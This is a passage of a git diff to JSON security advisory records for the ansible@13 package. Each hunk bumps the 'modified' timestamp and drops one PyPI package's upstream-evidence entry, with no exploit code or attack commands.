"BREW-ansible@13-CVE-2020-7212", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-20178.json b/advisories/BREW-ansible@13-CVE-2021-20178.json index fa0dd1ac6e6..48469ee2af5 100644 --- a/advisories/BREW-ansible@13-CVE-2021-20178.json +++ b/advisories/BREW-ansible@13-CVE-2021-20178.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-20178", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-wv5p-gmmv-wh9v", "CVE-2021-20178", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-20180.json b/advisories/BREW-ansible@13-CVE-2021-20180.json index e17574a7507..56dc6da2c6c 100644 --- a/advisories/BREW-ansible@13-CVE-2021-20180.json +++ b/advisories/BREW-ansible@13-CVE-2021-20180.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-20180", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-fh5v-5f35-2rv2", "CVE-2021-20180", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-20191.json b/advisories/BREW-ansible@13-CVE-2021-20191.json index 91a8c0a9912..a7a6e5f8d56 100644 --- a/advisories/BREW-ansible@13-CVE-2021-20191.json +++ b/advisories/BREW-ansible@13-CVE-2021-20191.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-20191", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-8f4m-hccc-8qph", "CVE-2021-20191", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-20228.json b/advisories/BREW-ansible@13-CVE-2021-20228.json index 07dccbd83d6..bab4178841b 100644 --- a/advisories/BREW-ansible@13-CVE-2021-20228.json +++ b/advisories/BREW-ansible@13-CVE-2021-20228.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-20228", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-5rrg-rr89-x9mv", "CVE-2021-20228", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-20270.json b/advisories/BREW-ansible@13-CVE-2021-20270.json index c8880c36d7a..3ec1201af25 100644 --- a/advisories/BREW-ansible@13-CVE-2021-20270.json +++ b/advisories/BREW-ansible@13-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-20270", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-21330.json b/advisories/BREW-ansible@13-CVE-2021-21330.json index 31e6da1db94..b0b82b0f199 100644 --- a/advisories/BREW-ansible@13-CVE-2021-21330.json +++ b/advisories/BREW-ansible@13-CVE-2021-21330.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-21330", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-v6wp-4m6f-gcjg", "CVE-2021-21330", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-27291.json b/advisories/BREW-ansible@13-CVE-2021-27291.json index 61dfd39d21e..7469c896b33 100644 --- a/advisories/BREW-ansible@13-CVE-2021-27291.json +++ b/advisories/BREW-ansible@13-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-27291", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-28363.json b/advisories/BREW-ansible@13-CVE-2021-28363.json index fdb9767adf7..01c315706cd 100644 --- a/advisories/BREW-ansible@13-CVE-2021-28363.json +++ b/advisories/BREW-ansible@13-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-28363", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-28957.json b/advisories/BREW-ansible@13-CVE-2021-28957.json index 811de74906e..e87d04a8c8f 100644 --- a/advisories/BREW-ansible@13-CVE-2021-28957.json +++ b/advisories/BREW-ansible@13-CVE-2021-28957.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-28957", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-jq4v-f5q6-mjqq", "CVE-2021-28957", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-33503.json b/advisories/BREW-ansible@13-CVE-2021-33503.json index 470a28bec40..a41d053cb2d 100644 --- a/advisories/BREW-ansible@13-CVE-2021-33503.json +++ b/advisories/BREW-ansible@13-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-33503", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-3583.json b/advisories/BREW-ansible@13-CVE-2021-3583.json index 9a1f16054ad..04aadb98c98 100644 --- a/advisories/BREW-ansible@13-CVE-2021-3583.json +++ b/advisories/BREW-ansible@13-CVE-2021-3583.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-3583", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-2pfh-q76x-gwvm", "CVE-2021-3583", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-3620.json b/advisories/BREW-ansible@13-CVE-2021-3620.json index 794925553bf..ec2e0ecadab 100644 --- a/advisories/BREW-ansible@13-CVE-2021-3620.json +++ b/advisories/BREW-ansible@13-CVE-2021-3620.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-3620", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-4r65-35qq-ch8j", "CVE-2021-3620", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-43818.json b/advisories/BREW-ansible@13-CVE-2021-43818.json index a1fdc004c17..527e26cb742 100644 --- a/advisories/BREW-ansible@13-CVE-2021-43818.json +++ b/advisories/BREW-ansible@13-CVE-2021-43818.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-43818", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-55x5-fj6c-h6m8", "CVE-2021-43818", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-46823.json b/advisories/BREW-ansible@13-CVE-2021-46823.json index 6fa8b91a594..56e727dce44 100644 --- a/advisories/BREW-ansible@13-CVE-2021-46823.json +++ b/advisories/BREW-ansible@13-CVE-2021-46823.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-46823", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-qfr5-wjpw-q4c4", "CVE-2021-46823", @@ -43,22 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-ldap", - "subject_version": "3.4.7", - "key": "pkg:pypi/python-ldap@3.4.7", - "resource": "python-ldap" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-ldap", - "subject_version": "3.4.7", - "key": "pkg:pypi/python-ldap@3.4.7", - "resource": "python-ldap" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2022-0718.json b/advisories/BREW-ansible@13-CVE-2022-0718.json index 3b7dee7535a..d73ba612b03 100644 --- a/advisories/BREW-ansible@13-CVE-2022-0718.json +++ b/advisories/BREW-ansible@13-CVE-2022-0718.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2022-0718", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-wmqq-r32m-87c5", "CVE-2022-0718", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "oslo-utils", - "subject_version": "10.1.1", - "key": "pkg:pypi/oslo-utils@10.1.1", - "resource": "oslo-utils" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2022-2309.json b/advisories/BREW-ansible@13-CVE-2022-2309.json index e94a5affbb8..96098c58cec 100644 --- a/advisories/BREW-ansible@13-CVE-2022-2309.json +++ b/advisories/BREW-ansible@13-CVE-2022-2309.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2022-2309", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-wrxv-2j5q-m38w", "CVE-2022-2309", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2022-24302.json b/advisories/BREW-ansible@13-CVE-2022-24302.json index 51437234346..5578cd24619 100644 --- a/advisories/BREW-ansible@13-CVE-2022-24302.json +++ b/advisories/BREW-ansible@13-CVE-2022-24302.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2022-24302", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-f8q4-jwww-x3wv", "CVE-2022-24302", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2022-36087.json b/advisories/BREW-ansible@13-CVE-2022-36087.json index fff5b8834bf..830d3eabfe7 100644 --- a/advisories/BREW-ansible@13-CVE-2022-36087.json +++ b/advisories/BREW-ansible@13-CVE-2022-36087.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2022-36087", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-3pgj-pg6c-r5p7", "CVE-2022-36087", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "oauthlib", - "subject_version": "3.3.1", - "key": "pkg:pypi/oauthlib@3.3.1", - "resource": "oauthlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2022-3697.json b/advisories/BREW-ansible@13-CVE-2022-3697.json index 1c72ab55755..1144d9221e2 100644 --- a/advisories/BREW-ansible@13-CVE-2022-3697.json +++ b/advisories/BREW-ansible@13-CVE-2022-3697.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2022-3697", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-cpx3-93w7-457x", "CVE-2022-3697", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2022-40896.json b/advisories/BREW-ansible@13-CVE-2022-40896.json index b54736ea147..4f167fb145a 100644 --- a/advisories/BREW-ansible@13-CVE-2022-40896.json +++ b/advisories/BREW-ansible@13-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2022-40896", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2022-40897.json b/advisories/BREW-ansible@13-CVE-2022-40897.json index f488246e8cc..18019e436e6 100644 --- a/advisories/BREW-ansible@13-CVE-2022-40897.json +++ b/advisories/BREW-ansible@13-CVE-2022-40897.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2022-40897", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-r9hx-vwmv-q579", "BIT-setuptools-2022-40897", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-26302.json b/advisories/BREW-ansible@13-CVE-2023-26302.json index 5961e1203fe..96277e4d1bf 100644 --- a/advisories/BREW-ansible@13-CVE-2023-26302.json +++ b/advisories/BREW-ansible@13-CVE-2023-26302.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-26302", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-jrwr-5x3p-hvc3", "CVE-2023-26302", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-26303.json b/advisories/BREW-ansible@13-CVE-2023-26303.json index 18dc21397d4..e51810b58b3 100644 --- a/advisories/BREW-ansible@13-CVE-2023-26303.json +++ b/advisories/BREW-ansible@13-CVE-2023-26303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-26303", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-vrjv-mxr7-vjf8", "CVE-2023-26303", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-29483.json b/advisories/BREW-ansible@13-CVE-2023-29483.json index 68d6a735650..538ca51ef52 100644 --- a/advisories/BREW-ansible@13-CVE-2023-29483.json +++ b/advisories/BREW-ansible@13-CVE-2023-29483.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-29483", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-3rq5-2g8h-59hc", "CVE-2023-29483", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "dnspython", - "subject_version": "2.8.0", - "key": "pkg:pypi/dnspython@2.8.0", - "resource": "dnspython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-32681.json b/advisories/BREW-ansible@13-CVE-2023-32681.json index ed4f864e9e2..91b56db2336 100644 --- a/advisories/BREW-ansible@13-CVE-2023-32681.json +++ b/advisories/BREW-ansible@13-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-32681", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-37276.json b/advisories/BREW-ansible@13-CVE-2023-37276.json index cf092d24b40..f62a0e288fe 100644 --- a/advisories/BREW-ansible@13-CVE-2023-37276.json +++ b/advisories/BREW-ansible@13-CVE-2023-37276.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-37276", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-45c4-8wx5-qw6w", "CVE-2023-37276", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-4237.json b/advisories/BREW-ansible@13-CVE-2023-4237.json index 99a14f86d0e..847f9947c88 100644 --- a/advisories/BREW-ansible@13-CVE-2023-4237.json +++ b/advisories/BREW-ansible@13-CVE-2023-4237.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-4237", "published": "2026-08-13T16:35:22Z", - "modified": "2026-09-03T08:45:29Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-ww3m-ffrm-qvqv", "CVE-2023-4237", @@ -41,14 +41,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible-core", - "subject_version": "2.20.7", - "key": "pkg:pypi/ansible-core@2.20.7", - "resource": "ansible-core" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-43804.json b/advisories/BREW-ansible@13-CVE-2023-43804.json index 7fd831606a6..e795e200235 100644 --- a/advisories/BREW-ansible@13-CVE-2023-43804.json +++ b/advisories/BREW-ansible@13-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-43804", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-45803.json b/advisories/BREW-ansible@13-CVE-2023-45803.json index cf996e2b70c..f66a6aa39c9 100644 --- a/advisories/BREW-ansible@13-CVE-2023-45803.json +++ b/advisories/BREW-ansible@13-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-45803", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-47627.json b/advisories/BREW-ansible@13-CVE-2023-47627.json index 07ecf9c9bb9..b02a3c805a7 100644 --- a/advisories/BREW-ansible@13-CVE-2023-47627.json +++ b/advisories/BREW-ansible@13-CVE-2023-47627.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-47627", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-gfw2-4jvh-wgfg", "CVE-2023-47627", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-47641.json b/advisories/BREW-ansible@13-CVE-2023-47641.json index 6e41a0fa934..5e2404f5c20 100644 --- a/advisories/BREW-ansible@13-CVE-2023-47641.json +++ b/advisories/BREW-ansible@13-CVE-2023-47641.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-47641", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-xx9p-xxvh-7g8j", "CVE-2023-47641", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-48795.json b/advisories/BREW-ansible@13-CVE-2023-48795.json index d6553f28761..fd26df54bd7 100644 --- a/advisories/BREW-ansible@13-CVE-2023-48795.json +++ b/advisories/BREW-ansible@13-CVE-2023-48795.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-48795", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-45x7-px36-x8w8", "CVE-2023-48795", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-49081.json b/advisories/BREW-ansible@13-CVE-2023-49081.json index ef94c8f796f..47b7e952f5a 100644 --- a/advisories/BREW-ansible@13-CVE-2023-49081.json +++ b/advisories/BREW-ansible@13-CVE-2023-49081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-49081", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-q3qx-c6g2-7pw2", "CVE-2023-49081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff 